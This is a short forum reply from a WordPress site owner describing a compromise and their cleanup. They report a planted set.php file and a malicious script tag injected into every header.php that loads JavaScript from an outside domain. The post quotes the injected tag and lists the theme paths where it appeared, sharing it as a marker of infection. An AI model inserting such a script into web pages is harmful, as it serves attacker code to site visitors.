Forum Replies Created

Viewing 1 replies (of 1 total)
  • This has been haunting me for a few weeks. I did find the set.php on my server and deleted it @happymania so let’s see if that works. I did notice that everywhere there was a header.php on the server it included the code to go to the stringengines url right after the header open parameter.
    Code it enjects in
    ****************
    Malicious Code:
    <script src=’https : // json . stringengines .com/pson.js?n=1′ type=’text/javascript’></script>
    *********
    THese are the places I have found the header.php file with the subsequent code:
    wp-content/themes/{your theme names} (ONce in all of them)
    wp-includes/theme-compat

Viewing 1 replies (of 1 total)